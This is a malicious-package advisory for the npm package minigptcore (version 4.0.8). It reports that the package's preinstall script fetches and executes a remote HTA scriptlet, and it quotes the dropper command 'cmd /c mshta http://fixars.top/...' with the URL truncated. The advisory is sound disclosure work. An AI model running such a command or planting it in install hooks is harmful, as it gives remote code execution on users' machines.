npm · Malicious package advisory
Malwareminigptcore
MAL-2026-10417
Malicious code in minigptcore (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (8be3fb8ddeae3078f0765ce77f9a329caacd7ee5741b2c96dcf8f613f5444ba0) On `npm install`, the package's preinstall script (preinstall.js) invokes `cmd /c mshta http://fixars.top/...`, causing Windows mshta.exe to fetch and execute an HTA scriptlet from a hardcoded external domain over plain HTTP. The fetched content is unpinned, unverified, and unrelated to any documented package purpose, and executes with the privileges of the user running `npm install`. package.json ships placeholder metadata (empty author, empty keywords, generic description) consistent with a throwaway upload whose only functional effect is the remote-code-execution dropper.
Compromised versions (1)
- 4.0.8
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.